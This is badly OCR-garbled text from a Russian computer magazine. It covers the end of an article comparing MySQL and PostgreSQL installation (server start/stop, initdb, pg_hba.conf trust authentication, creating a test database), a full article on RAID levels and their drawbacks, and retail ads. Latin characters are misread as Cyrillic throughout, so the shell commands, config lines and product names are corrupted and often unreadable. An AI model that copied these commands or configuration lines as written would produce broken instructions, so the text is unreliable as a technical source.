$ зибо /изг/1оса1/тузд1/Ьіп/ 
тузд1б_за!е --изег=тузд1 -- 
бакабіг= /ѵаг/ бЪ/ту зді 
Зкагкіпд туздіб баетоп члікЬ 
бакаЪазез кгот /ѵаг/бЬ/туздІ 

Сразу замечу, что остановить запущенный 
сервер можно такой командой: 

$ зибо кііі 'зибо сак /ѵаг/бЬ/ 
тузді /козМЪа .ріб' 

Для удобства команды запуска и останова 
можно оформить в виде стартового 
сценария. Еще одна причина воспользовать- 
ся дистрибутивной установкой — там все 
это уже сделано. 

Таблицы формата Му I ЗАМ будут размещаться 
в указанном каталоге «пофайлово», в то время 
как таблицы ІппоИВ размещаются в одном 
или нескольких файлах-хранилищах, согласно 
конфигурационному файлу. 

В Роз^геЗС^Б поддерживается один тип храни- 
лища данных, поэтому все несколько проще 
— нужно создать каталог, где будет распола- 
гаться хранилище, сделать его владельцем 
пользователя розі:§гез и выполнить 
инициализацию: 

$ зибо ткбіг -р /ѵаг/бЪ/рдздІ/бака 
$ зибо скюѵт розкдгез /ѵаг/бЬ/ 



рдзді/бака 
$ зибо зи розкдгез 
$ сб /изг/1оса1/рдзд1/Ьіп 
$ . /іпікбЪ -Б /ѵаг/бЪ/рдздІ/бака 
$ ехік 

После инициализации будет выведено 
предупреждение, что для локальных подклю- 
чений разрешена так называемая шизьаутен- 
тификация (об этом — чуть позже), и показаны 
два способа запустить сервер. В первом случае 
— «розі^гез -Б /ѵаг/бЪ/р§зд1/баі:а» — сервер 
запустится в интерактивном режиме, то есть 
информация о его работе будет отображаться 
в окне терминала, а при закрытии терминала 
сервер будет остановлен. Безусловно, работа- 
ющий процесс всегда можно перевести в фоно- 
вый режим, либо сразу указав символ «&» после 
команды, либо в дальнейшем приостановив 
его работу комбинацией клавиш <Скг1-2> и за- 
тем возобновив в фоне с помощью утилиты Ъ§: 

$ зибо -и розкдгез . /розкдгез -Б 
/ ѵаг /бЬ/рдзд1 /бака 
БОС: бакаЬазе зузкет маз зЪик 

боѵт ак 2006-12-16 13:58:54 М8К 

БОС: бакаЬазе зузкет із геабу 

// здесь нажали <Скг1-2> 

[1]+ Зкорреб зибо -и розкдгез ./ 
розкдгез -Б /ѵаг/бЬ/рдздІ/бака 
$ Ьд 

[1]+ зибо -и розкдгез ./розкдгез -Б 
/ѵаг/бЬ/рдздІ/бака & 

Управление сервером с помощью р§_сб, на 
мой взгляд, более удобно, и в этом случае 
сервер будет сразу запущен как фоновый 
процесс. Только нужно не забывать, что 
обе команды должны быть выполнены от 
имени пользователя розі^гез. В приведенном 
выше примере это выполняется с помощью 
утилиты зибо. Если запуск сервера прошел без 
ошибок, значит, для работы все готово. 

А если возникнут какие-либо проблемы, то 
они достаточно подробно будут расписаны 
в сообщениях, выводимых на экран или 
в лог. Чаще всего они бывают связаны с пра- 
вами доступа: либо не того пользователя 
сделали владельцем хранилища, либо от 
имени неправильного пользователя запускается 
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> ту5ЦІ_іп5ІаІІ_сІЬ: читаем все внимательно 




> рЬрМуАсІтіп: все, что нужно для комфортной работы, — браузер 
и кусочекАпача 



сервер. Но перед началом работы хорошо бы 
посмотреть, а что же у нас творится в на- 
стройках. Конфигурация Розі^геЗС^Б запрята- 
на в каталоге хранилища, которое создается 
во время инициализации. В нашем случае 
это будут файлы розі^гезді.сопі, 
р§_ЬЬа.сопГ и р^ібепссопі в каталоге 
/ѵаг/с!Ъ/р$^1/сІаі:а. В первом из них 
сосредоточены основные опции, управля- 
ющие работой сервера. По умолчанию они 
работают достаточно хорошо, но в случае 
проблем с производительностью имеет смысл 
попробовать их подкрутить под конкретные 
условия. Оставшиеся два файла отвечают за 
доступ к серверу. Они снабжены предельно 
подробными комментариями, так что разо- 
браться с ними не составит труда. Кстати, пре- 
дупреждение о ітизБаутентификации, полу- 
ченное при инициализации базы, связано со 
следующими строками в р§_ЬЬа.сопГ: 

# "Іосаі" із Бог Цпіх сіотаіп зоскеБ 

соппесЕіопз опіу 

Іосаі аіі аіі ЕгизЕ 

# ІРѵ4 Іосаі соппесЕіопз: 

ЕюзЕ аіі аіі 127.0.0.1/32 ЕгизЕ 

# ІРѵб Іосаі соппесЕіопз: 

ЕюзЕ аіі аіі :: 1/128 ЕгизЕ 

Они означают, что любой локальный 
пользователь, подключающийся к любой 
базе, сможет соединяться с сервером без 
указания пароля. В некоторых дистрибути- 
вах вместо второго аіі (означающего «все 
пользователи») ставят более жесткое ограни- 
чение — затеизег, при котором пользователь 
может подключиться к базе только в том 
случае, если его имя в Розі^геЗС^Б совпадает 
с системным именем. Если тебе нужен доступ 
к БД «снаружи», добавь соответствующие 
строки. Например, так можно разрешить 
доступ к серверу всем пользователям к базе 
соттоп из указанной подсети с аутентифи- 
кацией через РАМ или ІЮАР (поддержка соот- 



ветствующих типов аутентификации должна 
быть добавлена на этапе компиляции) : 

ЕюзЕ соттоп 

аіі 10.0.0.0/8 ратДсЗар 

Отрегулировав права, можно подключаться 
к базе іетріащі (она создается при инициали- 
зации и служит шаблоном для всех создавае- 
мых впоследствии баз, если явно не указана 
база-«родитель») : 

$ Ъіп/рзді -Ю розЕдгез ЕетрІаЕеІ 
Еетр1аЕе1=# сгеаЕе изег ЕезЕ; 

СКЕАТЕ ЕОЬЕ 

Еетр1аЕе1=# сгеаЕе сІаЕаЪазе ЕезЕ 
оѵтег ЕезЕ; 

СКЕАТЕ БАТАВАЗЕ 

Еетр1аЕе1=# \с ЕезЕ ЕезЕ 

Уои аге поѵі соппесЕес! Со СІаЕаЪазе 

«ЕезЕ» аз изег «Вез О» . 

ЕезЕ=> сгеаЕе ІаЫе ЕезЕ ( Епит 
питегіс, ІзЕг ѵагсЬаг) ; 

СКЕАТЕ ТАВЬЕ 
ЕезЕ=> \д 

Здесь мы создали пользователя ГезГ и одно- 
именную базу для экспериментов. Раз все 
получилось, значит, установка прошла без 
эксцессов. 

Кое-что про функциональность 

К сожалению, рамки этой статьи не позволя- 
ют подробно остановиться на работе 
с базами, но это, как говорится, уже дело 
техники. Пару слов скажу о возможностях, 
которые предоставляют эти СУБД. 

Начиная с версии 5.0, функциональ- 
ные возможности МуЗС^Б существенно 
расширились: появилась поддержка 
триггеров, хранимых процедур, пред- 
ставлений (ѵіеѵѵ), курсоров. Поддержка 
нескольких типов таблиц позволяет гибко 
лавировать между надежностью и скоро- 
стью. В общем, МуЗС^Б сейчас вплотную 
приближается по своим возможностям 



к таким «монстрам», как Огасіе, ОВ2 и 
М3 3(^Б, хотя на данном этапе ей пока недо- 
стает зрелости. 

А что же Розі^геЗС^Б? Все перечисленные выше 
функциональные возможности в ней были 
давно, и их можно считать вполне зрелыми 
и проверенными временем. Огромным 
плюсом, на мой взгляд, является возможность 
использования различных языков для разра- 
ботки «серверной логики». 

К тому же Роз^геЗС^Б всегда славилась своей 
поддержкой стандартов — в отличие от 
других СУБД, включая МуЗСД, в Роз^геЗСД 
стандарты 3(Д-92 и ЗОБ-99 поддерживаются 
наиболее полно и последовательно, в пос- 
ледних версиях появилась частичная 
поддержка ЗОБ-2003. Хотя, какпоказывает 
практика, стандарты, к сожалению, не поль- 
зуются должной популярностью. 

О производительности говорить не буду, пос- 
кольку этот вопрос требует проведения серь- 
езного исследования и, по возможности, на 
различном железе. Небольшие тесты, кото- 
рые я проводил «на коленке», не продемонс- 
трировали явного преимущества МуЗС^Б, да- 
же с таблицами МуІЗАМ, и если верить 
сторонним исследованиям, Розі^геЗС^Б 
гораздо лучше держит нагрузку, в то время 
как МуЗС^Б проваливается при большом числе 
одновременных запросов (смотри Еѵѵеакегз. 
пеЕ/геѵіеѵѵз/бБУ^) . 

Итоги 

Итак, получается, что Му ЗОБ и Розі:§геЗ(2Б 
сейчас довольно близки функционально, хо- 
тя МуЗС^Б по-прежнему в роли 
догоняющего. То, что одна сложнее другой 
в установке или в работе, тоже не ска- 
жешь, — это, скорее, дело привычки и личных 
предпочтений. Скорость работы — вопрос 
сложный, и ответ на него зависит 
от целого ряда условий (режим использования, 
железо, размеры и структура базы и т.д.). 
Выбирать, конечно, тебе, но советую обратить 
внимание на Розі^геЗС^Б, если ты еще с ней 
не работаешь. Она того заслуживает. НС 
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» ХАКЕР.РКО 



ВСЕ, ЧТО ТЫ ХОТЕЛ ЗНАТЬ О КАШ-МАССИВАХ, НО БОЯЛСЯ СПРОСИТЬ 



Лет десять назад КАГО-массивы были экзотикой, встречающейся только на серверах и крутых рабочих 
станциях. Сейчас же КАГО-контроллеры настолько подешевели, что массово встраиваются в материн- 
ские платы, соблазняя юзеров объединить несколько дисков в один массив, но за это искушение прихо- 
дится дорого платить. 




мачная аббревиатура КАТО расшиф- 
ровывается какКебипбапт Аггау 
оНпберепбепт/Іпехрепзіѵе Оізкз 
(дисковый массив недорогих/независимых 
дисков) . Дэвид Петтерсонон, Гарт Гибсон и Рэн- 
ди Катц предложили для борьбы с отказами 
винчестеров (тогда они случались намного 
чаще, чем сейчас) использовать избыточный 
массив недорогих дисков. Идея получила разви- 
тие, и очень скоро в КАГО'ы стали объединять 
дорогие диски, поэтому слово «іпехрепзіѵе» 
(«дешевый») заменили словом «іпсіерепсіепі» 
(«независимый») — сейчас КАГО принято рас- 
шифровывать именно так. 



Типы КАГО'ов 

Но как КАГО-массивом можно распорядиться? 
Если объединить несколько физических дисков 
в один виртуальный и поблочно писать /читать 
со всех дисков сразу, мы получим НАТО уровня О 
(Зігіресі Зеі), значительно увеличивающий ско- 
рость операций ввода/вывода (а, как известно, 
в большинстве случаев ввод/вывод — самое 
узкое место в системе) . В грубом приближении 
скорость обмена прямо пропорциональна ко- 
личеству дисков, то есть два диска увеличивают 
производительность практически вдвое. 
Однако здесь есть одно «но». Время поиска 
секторов (особенно при «далеких» позициони- 
рованиях) не постоянно, и винчестер нещадно 
гоняет магнитную головку, отыскивая нужный 
сектор методом вилки. При работе с одним 
жестким диском время поиска сектора равно 
Х+/-п, где п — максимальное отклонение от 
среднего времени поиска, обусловленного 



конструктивными особенностями привода. 
При работе с массивом дисков время поиска 
увеличивается до Х+ п, поскольку контроллер 
вынужден дожидаться завершения операции 
обмена с самым медленным из дисков. 

Таким образом, чем больше у нас дисков, тем 
меньший прирост производительности они 
дают. Переходе одного диска на два чувствуется 
сразу, а добавление еще двух дисков уже практи- 
чески не ощущается. Тем более что при работе 
с мелкими файлами ожидаемого ускорения 
вообще не наступает, поскольку невозможно 
обеспечить перекрывающееся чтение/запись 
нескольких небольших сегментов информации. 
К тому же чем больше дисков, тем выше веро- 
ятность отказа каждого из них, а поскольку 
запись ведется блочным образом (то есть блок 
1 записывается на диск 1, блок 2 — на диск 2, 
блок 3 — на диск 3 и т. д.) , то при выходе одного 
диска из строя из данных образуется «решето», 
своеобразный реквием по хранящейся на КАГО'е 
информации. КАГО 0 — это крайне ненадежная 
штука, и пользоваться ей можно только, напри- 
мер, для рабочей станции, предназначенной для 
обработки цифрового видео, но ни в коем слу- 
чае не для долговременного хранения данных! 



СХЕМА ХРАНЕНИЯ ДАННЫХ НА КАГО О 

КАГО-контроллер 

Ідискі | диск 2 | дискЗ | диск 4 | диск 5 1 

| СЕГМЕНТ 1| СЕГМЕНТ 2 | СЕГМЕНТ 3 | СЕГМЕНТ 4 | СЕГМЕНТ 5 1 
| СЕГМЕНТ 6 | СЕГМЕНТ 7 | СЕГМЕНТ 8 | СЕГМЕНТ 9 | СЕГМЕНТ 10 1 



А можно поступить иначе и писать одни и те же 
данные на все диски сразу, дублируя информа- 



цию, чтобы при выходе одного жесткого диска 
из строя ее было возможно автоматически вос- 
становить с другого. Такой массив называется 
«зеркальным» (Міггогесі Зеі) и соответствует 
КАГО-уровню 1. При этом надежность резко 
возрастает, а время поиска секторов по-пре- 
жнему равняется Х+ п, то есть КАГО 1 не только 
не ускоряет, но даже замедляет обмен данными 
по сравнению с обычным жестким диском. 



СХЕМАХРАНЕНИЯ ДАННЫХ НА КАГО 1 

КАГО-контроллер 



диск 1 


I диск 2 I 


дискЗ 


I диск 4 1 


диск 5 


| данные | копияд.1 1 


данные 


| копияд.3 


свободный 


| СЕГМЕНТ 1 | СЕГМЕНТ 1 | 


СЕГМЕНТ 2 


| СЕГМЕНТ 2 | 


1 


| СЕГМЕНТ 3 


| СЕГМЕНТ 3 | 


СЕГМЕНТ 4 


| СЕГМЕНТ 4 | 


1 



КАГО'ы уровней 2 и 3 обычно работают сразу 
с пятью дисками, храня на них не только полез- 
ные данные, но и байты четности, позволяю- 
щие восстановить вышедший из строя диск за 
счет остальных. Покажем, как это происходит 
на примере битов (тем более что восстановле- 
ние данных — это битовая операция) . Пусть 
на четыре диска пишется: 1011. Складывая 
биты друг с другом, получаем 3, а 3 по модулю 2 
равно 1, вот этот самый 1 мы и пишем на пятый 
диск. Теперь представим себе, что второй диск 
вышел из строя: 1x111. Мы вновь складываем 
биты, делим полученный результат по модулю 2 
и получаем 0, что и требовалось доказать! 
Дисков не обязательно должно быть пять, 
некоторые контроллеры работают и с тремя, но 
это неважно. Важно, что мы получаем и произ- 
водительность, и надежность. Разница между 
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> Пяти дискам, объединенным в один РАГО-массив, в бюджетном дисков с интегрированным контроллером, в форм-факторе 3,5" 
корпусе просто не хватило места! 5іпдІе51о* 



КАТО 2 и КАТО 3 заключается в том, что КАЮ 2 
задействует для хранения битов четности не- 
сколько дисков, в то время как КАТО 3 — только 
один, вследствие чего КАЮ 2 встречается край- 
не редко, да и КАЮ 3 используется не часто. 



СХЕМА ХРАНЕНИЯ ДАННЫХ НА КАТО 3 

КАГО-контроллер 



| диск 1 


диск 2 


дискЗ | диск 4 | диск 5 1 


данные 


| данные 


| данные | данные | четность | 


| БАЙТ 1 | 


БАЙТ 2 | 


БАЙТ 3 | БАЙТ 4 | БАЙТ ЧЕТНОСТИ | 


| БАЙТ 5 


| БАЙТ 6 | 


БАЙТ 7 | БАЙТ 8 | БАЙТ ЧЕТНОСТИ | 



КАТО уровня 4 — это фактически усовершенс- 
твованный КАЮ 3, устраняющий проблему 
производительности при работе с небольшими 
объемами информации за счет использования 
только того диска, на котором эта информа- 
ция хранится. Это позволяет обрабатывать 
несколько запросов на чтение одновременно 
(класс, особенно при работе с кучей мелких 
файлов!) . Однако запросы на запись порожда- 
ют блокировки, вызванные необходимостью 
обновления байтов четности, и в настоящее 
время КАГО 4 используется крайне редко. 

КАТО уровня 5 обходит проблему блокировок 
при записи путем распределения байтов чет- 
ности по всем дискам, обеспечивая максималь- 
но возможную скорость обмена и высокую 
отказоустойчивость. Естественный недостаток 
— контроллеры этого типа довольно дорого 
стоят, к тому же необходимо как минимум три 
жестких диска! Впрочем, цены, как на диски, 
таки на контроллеры, неуклонно снижаются, 
и в обозримом будущем КАГО 5 рискует стать 
самым популярным типом из всех остальных. 



СХЕМА ХРАНЕНИЯ ДАННЫХ НА КАГО 5 

КАГО-контроллер 

Ідискі | диск 2 | дискЗ | диск 4 | диск 5 1 

| СЕГМЕНТ ЧЕТ. | СЕГМЕНТ 1 | СЕГМЕНТ 2 | СЕГМЕНТ 3 | СЕГМЕНТ 4 | 
| СЕГМЕНТ 5 | СЕГМЕНТ ЧЕТ. | СЕГМЕНТ 6 | СЕГМЕНТ 7 | СЕГМЕНТ 8 | 
| СЕГМЕНТ 9 | СЕГМЕНТ 10 | СЕГМЕНТ ЧЕТ. | СЕГМЕНТ 11 | СЕГМЕНТ 12 | 



Большинство дешевых контроллеров, не под- 
держивающих КАГО 5, тем не менее, позволя- 
ют создавать гибридные дисковые массивы на 
основе КАГО 0 + КАГО 1, но в этом случае нам 
потребуется по меньшей мере четыре жестких 
диска, а избыточность будет составлять 50%, 
против 30% у КАГО 5, работающего всего 
с тремя дисками. 

Помимо аппаратных, существуют также и про- 
граммные КАГО'ы, поддерживаемые практи- 
чески всеми современными операционными 
системами (такими какБіпих/ВЗП/ПТ/ѴѴ2К/ 
ХР, а вот ѴѴіпсіоѵѵб 9х в этот список не вхо- 
дит) . Будучи подключенными к различными 
ГОЕ-каналам, они обеспечивают схожую (или 
чуть-чуть более низкую) производительность, 
зато по гораздо более дешевой цене. С точки 
же зрения надежности программный КАГО 
ничем не отличается аппаратного, можно даже 
сказать, что он выигрывает у него, поскольку 
чем больше железа установлено в компьютер, 
тем выше риск его поломки — это закон, против 
которого не пойдешь. 

Польза КАШ-массивов 

КАГО'ы обеспечивают либо отказоустойчи- 
вость, либо производительность, либо и то, 
и другое одновременно. Причем на дисках, 
поддерживающих горячую замену (онаже 
Ьоі;-р1и§ 5С51, 5АТА), выключать компьютер 
для смены вышедшего из строя винчестера не 
обязательно. Это, кстати говоря, актуально не 
только для серверов, но и для рабочих станций, 
занимающихся обработкой цифрового видео 
или другими продолжительными расчетами, 
которые затрачивают десятки часов машинного 
времени и не могут быть прерваны. Остановка 
системы означает, что все придется начинать за- 
ново и отработанные часы потрачены впустую. 
Также объединение нескольких дисков в один 
позволяет создавать разделы большого размера. 
Это весьма актуально на КАГО 0 при работе 
с морально устаревшими (следовательно, 
дешевыми) винчестерами на несколько гектар. 



Объединив их вместе, мы получим здоровенный 
раздел, доставшийся нам практически задаром. 
Вот, собственно, и все преимущества КАГО'ов. 
Теперь проговорим об их недостатках. 

Вред КАШ-массивов 

КАГО-массив страхует только от аппаратного 
выхода одного (реже — двух) жестких дисков из 
строя, он не в состоянии противостоять другим 
типам разрушения данных, таким как вирусы, 
ошибки оператора, хакерские атаки, сбои 
операционной системы и ее окружения. А при 
выходе из строя блока питания или падения 
компьютера со стола (например), все диски 
массива обычно вылетают разом. Таким обра- 
зом, вне зависимости от наличия/отсутствия 
КАГО'а регулярное резервирование данных 
все равно остается обязательным! А если есть 
резервная копия, тогда какая польза от КАГО'а? ! 
Восстанавливать же информацию с КАГО'ов 
намного сложнее. Их поддерживают 
далеко не все лечащие утилиты, а фирмы, 
специализирующиеся на восстановлении, 
дерут за работу двойную-тройную цену, 
если вообще за нее берутся! 

Причем КАГО-массив может работать только 
с тем контроллером, которым он был создан. 
Контроллеры различных производителей 
(и даже разные модели контроллеров одного 
и того же производителя) несовместимы друг 
с другом, и если навернется контроллер, то 
прощай, весь дисковый массив! Хорошо, если 
КАГО-контроллер внешний, тогда его можно 
будет, по крайней мере, попытаться купить 
(именно попытаться, так как он давно уже мо- 
жет быть снят с выпуска и предан забвению) . 
А вот при выходе из строя КАГО-контроллера 
на материнской плате (равно как и любого 
другого ее жизненно важного компонента), 
наступает точка кипения — нам придется 
купить точно такую же материнскую плату, 
при условии что их модельные ряды обновля- 
ются каждый сезон и «старички» исчезают из 
прайс-листов и складов со скоростью торнадо. 
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> Выбор типа дискового массива в Ьіоз'е РАШ-контроллера > Р-51исііо, способная автоматически восстанавливать разрушен- 

ные РАШ-массивы 



Идея купить несколько внешних КАШ-конт- 
роллеров про запас, конечно, хорошая (если 
не учитывать финансовую сторону дела), но 
глубоко неправильная, так как современные 
микросхемы очень часто дохнут из-за сложных 
физико-химических процессов, разрушающих 
их изнутри. Чего только стоит один рост крис- 
таллов в подложке, который может привести 
к утечкам, вызывающим настырные сбои или 
даже полную неработоспособность. Причем 
поскольку нагрев и другие физико-механичес- 
кие воздействия разрушают кристаллы еще 
в зародыше (точнее, тормозят их развитие), 
то контроллер, мирно покоящийся на полке, 
имеет все шансы выйти из строя раньше, чем 
тот, который постоянно находится в работе. 

В этом смысле программные КАШ-массивы 
более предпочтительны, поскольку работают 
с любым ШЕ/ЗСЗІ-контроллером, но и тут 
есть свои тонкости. Вплоть до ѴѴіпсіошб 2000, 
система хранила данные о дисковом массиве 
в. . . реестре! Следовательно, крах (или переус- 
тановка с нуля) ѴѴіпсіоѵѵб означал и крах самого 
дискового массива со всеми содержащимися 
в нем данными. В ѴѴіпсіоѵѵб 2000 и более стар- 
ших версиях МісгобоЙ высадила концепцию 
«динамических дисков» — по сути дела, тех же 
самых программных КАШ'ов, но! Теперь вся 
служебная информация хранится уже не в ре- 
естре, а на самом диске (дисках), и они могут 
быть подключены к любой другой \У2К, ХР. 

А вот диски, подключенные к КАШ-контрол- 
леру (неважно — интегрированному или 
нет), в сумке уже не поносишь и просто так 
к другому компьютеру не подключишь ! Как же 
тогда обмениваться данными друг с другом? 
Как осуществлять апгрейд системы? Интег- 
рированные контроллеры привязывают нас 
к материнской плате, не интегрированные 
— к текущей операционной системе, поскольку 
вовсе не факт, что другая ось поддерживает 
этот КАШ-контроллер, как не факт и то, что его 
производитель поддерживает все оси, которые 
нам нужны. Ну, ѴѴіпсіоѵѵб еще туда-сюда, хотя 



под устаревшие (по мнению производителей) 
контроллеры новые драйверы, как правило, не 
выпускаются со всеми вытекающими отсюда 
последствиями. 

Наконец, у дисков, подключенных к КАШ- 
контроллерам, очень сложно, а иногда 
и вообще невозможно прочитать показания 
3. М. А. К. Т. (системы самотестирования 
и мониторинга) . А читать их крайне полезно, 
поскольку по ним можно с некоторой веро- 
ятностью предсказать, сколько еще винту 
жить осталось, и узнать его температуру. 
Когда диск один, за его температуру можно, 
в общем-то, и не волноваться, но вот массив 
из четырех тесно расположенных дисков (а по 
другому их располагать даже в Ві^Тоѵѵег'е 
никакие получается) способен нагреваться 
до весьма высоких температур, требующих 
немедленной установки дополнительных 
систем охлаждения. 

Советы по выбору КАШ'а 

Если же ты все-таки решил объединить диски 
в КАТО и никакими способами тебя не отгово- 
рить, то, по крайней мере, останови свой выбор 
на контроллере именитого производителя (та- 
кого как, например, АбарЩс), который назавт- 
ра не исчезнет вместе со своими поделками. 

Что же касается интегрированных контрол- 
леров, тут тоже следует выбирать наиболее 
популярные чипы, используемые многими 
производителями материнских плат (хотя 
и не факт, что «чужая» материнская плата, 
даже с тем же самым чипом, подхватит уже 
собранный КАЮ) . Если на материнской плате 
имеется несколько контроллеров (например, 
от ІпНеІ, ІТЕ и Зііісоп Іта§е), следует выбирать 
тот, который распознается операционной 
системой без установки внешних драйверов 
(в данном случае это Зііісоп Іта§е) . Иначе при 
ремонте упавшей системы могут возникнуть 
серьезные проблемы, самая распространен- 
ная из которых заключается в следующем: 
грузимся с Ілѵе СИ, а ось в упор не видит 



КАШ'а. Кстати говоря, Зііісоп Іта§е штатно 
поддерживается не только ИТ, но и остальны- 
ми операционными системами (Ілпих/ВЗЭ), 
а вот Ішеі — увы. ІТЕ не дружит с ИТ, однако 
понимается Ілпих'ом и ВЗЭ, так что в случае 
аварии Кпорріх ІлѵеСЭ нам поможет. 
Существуют нелепые слухи, что при установке 
в КАЮ требуются винчестеры одной модели 
или, по крайней мере, одного производителя. 
Это чушь! Можно брать любые диски, не толь- 
ко разных производителей, но даже разного 
размера. В случае КАШ'а уровня 0 мы ползшим 
диск суммарной емкости, в случае КАШ 1 — на- 
именьшей из всех имеющихся. Вся хитрость 
в том, что, как неоднократно показывала прак- 
тика, диски одной модели, имеющие дефекты 
проектирования или косяки в техпроцессе, 
выходят из строя примерно в одно и то же 
время, с разбросом всего в несколько месяцев. 
Это приводит к тому, что члены КАШ-массива 
выходят из строя один за другим прежде, чем 
владелец машины успевает заменить их. 

Выбор дисков от разных производителей 
реально зшеличивает надежность хранения 
данных на КАШ 1 и КАШ 5. Что же касается 
КАШ 0, то даже при отказе одного из дисков 
он теряет все хранимые на нем данные, и тут, 
действительно, л)шше выбирать идентичные 
модели, обладающие сходными скоростными 
характеристиками. 

И последнее. Если КАШ все-таки упал, не стоит 
паниковать и рвать себе вены зубами. Возьми 
К-Зшсііо от К-Тооіб Тес1іпо1о§у ( ѵуплпл/. г-н. сот) 
— это лзшшее средство для автоматического 
восстановления из всех имеющихся. 

Заключение 

Так что же все-таки, по большому счету, пред- 
ставляют собой КАШ'ы? Добро или зло? Воп- 
рос сложный, можно даже сказать, риторичес- 
кий. И, как к любому риторическому вопросу, 
к нему надо подходить с философской точки 
зрения. То есть выбирать, руководствуясь 
собственной интуицией и чутьем. Ш-И 
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Высокий уровень контрастности достигается за счет 

новейшей технологии Оідгіаі Ріпе Сопігаві: 





2000:1 

ОідйаІ 

Ріпе 

Сопігазі 



Во Власти Качества 

Высокий контраст 

ЖК - монитор Ю РШТОЫ И960ТО 

іпаѴісіогіа 

(495) 688-61-17, ѵ/ѵѵѵѵ.сІѵсотр,ги 

МОСКВА: РгопеГ Сгоир (495) 789-38-46. Неоторг (495 ) 223-23-23. розничная сеть Роіаиі (495) 363-93-33. Ф-Центр (495) 472-64-01, 
МТ Согпріііегі (495) 363 93 33, Техносила (495) 777 87 77. Компания Кит (495) 777 66-55. Паке (495) 236 99-25, ДБ групп (495) 745 51 75. 
Сетная Лаборатория (495) 7*4-64-90, і$м (495) 718-40-20, Ни* (495) 974-33-33, ОЛДи (495) Ю5-07-00, 0$м Сотрут (495) 221-72-97, 
Старт- Мастер (495) 935-38-52, Акситек (495) 784-72-24, Эльдорадо (495) 500-00-00, Кибертроникѳ (495) 504-25-31, 
Дилайн (495) 969-22 22, ІІІІга Сотриіегі (495) 775 75 66, Алмер (495) 101 39 25, Микросет (495) 924 27 47, Гипермаркет Санрайэ Про 
(495) 542-80-70, ДЕЛ (495) 250-44-66, Ланит (495) 967-66-84, ОСЮ вега (495 ) 784-72-35, ГЕЛИОС КОМПЬЮТЕР 

(495 ) 785-03-76, Бит и Байт (495) 788-37-57 САНКТ-ПЕТЕРБУРГ: ДБМНееа (812) 325-11-05 НИЖНЕВАРТОВСК; Лэнвдрд (3466) 61-22-22, 
ПЕРМЬ: Гаском (342) 237-19-33. НИЖНИЙ НОВГОРОД: АйТиОн (8312) 63-01-53. ТЮМЕНЬ: Инжс-Техника (3452) 39-00-36. Торговый дом 
"Весы* (3452) 75 00 00. КРАСНОДАР: Иманго Краснодар (861) 255-15 52. НОВОСИБИРСК: Квеста (383 ) 333-24 07. 
Арсиситек (383) 221-16-89, нЭТа (383) 218-22-18. Барнаул: компьютер Трейд (3852) 66-69-00. Электросталь: 

Дометехника (257) 21488 ИРКУТСК: Комтек (3952) 25-83-38, Билайн (3952) 24-00-24 КРАСНОЯРСК: Альдо (3912) 21-11-45, Старком 
(3912) 62 33 99, Аверс (3912) 56 05 61. ЛИПЕЦК: Регард Тур (0742) 48 45 73. ВОРОНЕЖ: Сани (0732) 54 00 00, Рот (0732) 77 9 3 39. 
ТОМСК: Стек (3822) 55-71-43- РЯЗАНЬ: ДЙК (0912) 90-00-00. ЯРОСЛАВЛЬ: Фронтекс (4852) 72-38-49. ОМСК; Технопарк (3812) 57-93-19, 
Лик-2000 (3812) 22-97-00, АЛЬМЕТЬЕВСК: Компьютерный мир (8553) 25-98-48, ВОРОНЕЖ: РИАН (4732) 51-24-12, 

ЛАБЫТНАНГИ: КЦ Ямал (34992 ) 51-777. ИЖЕВСК: ЭЛМИ (3412) 50-50-50. Корпорация «Центр» (3412 ) 43 8 8 08. 

СЫЗРАНЬ: ООО 'фирма Такт' (8464) 98-34 34. ЕКАТЕРЕНБУРГ: Трипайи (343) 378 70-70. БЛАГОВЕЩЕНСК: А Эл Джи Софт 
(4162) 31-70-14. Киров: Портал (8332) 38-20-60- Таганрог: Иманіо (8634) 315-628. Гомель: компьютер маркег -1-375 (232) 48-Ю-48. 

Информационная служба Ю Ыесігапісз 8 800 200 /6/6 (бесплатная горячая линяя по России) 
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Думаешь, что посмотреть сегодня вечером? 

Выбираем кино с ТОТА І_ ОѴО! 

Все о кино - читай о блокбастерах месяца, размышляй о 
лентах вместе со звездами, выбирай на какой сеанс пойти 

* 

Все о ОѴР - самые лучшие релизы месяца, более 50 
обзоров, море интервью 

* 

...и немного о технология* будущегоі Телевидение высокой 
четкости, плазмы и многое другое! 

ТоЫ СѴО - ультимативный журнал для киноманов! 

Каждый журнал комплектуется ШО- приложением с великолепным 
полнометражным фильмам категории «А-' (качество изображении и 
Эйука на диске Соответствует лучшим мировым релиым'І, Подборкой 
трейлеров и анонсов новыя картин н роликами к ОѴО-реднзэм, 



Ищешь себе технику для домашнего кинотеатра? 
*ОѴО Эксперт» - самый лучший гид по аудио- 
видео* новинкам' 

Все о Ні-Рі, НідГі Епгі и Ногт>е Сіпеглэі 

* 

Пошаговые инструкции по составлению и инсталляции 

системы домашнего кино 

* 

Лучшие системы и компоненты месяца - рай для новичков- более 
50 самых новых моделей е оценочных и срэѳнитедьны* тестах 

* 

Готовые системы, интервью, самые свежие новости индустрии 
Всегда на лезвии прогресса» 

Выбираем домашний кинотеатр с журналом «ВѴО Эксперт^! 
Сейчас это стильно, это модно, это доступно, это просто! 

Каждый журнал комплектуется ОУО приложением с великолепным 
попноѵетрлжнмм фильмов категории нА* (качество изображения и звука 
на диске соответствует лучшим мировым релизам! и тостами для кс^сі ройки 
системы муум синема. 






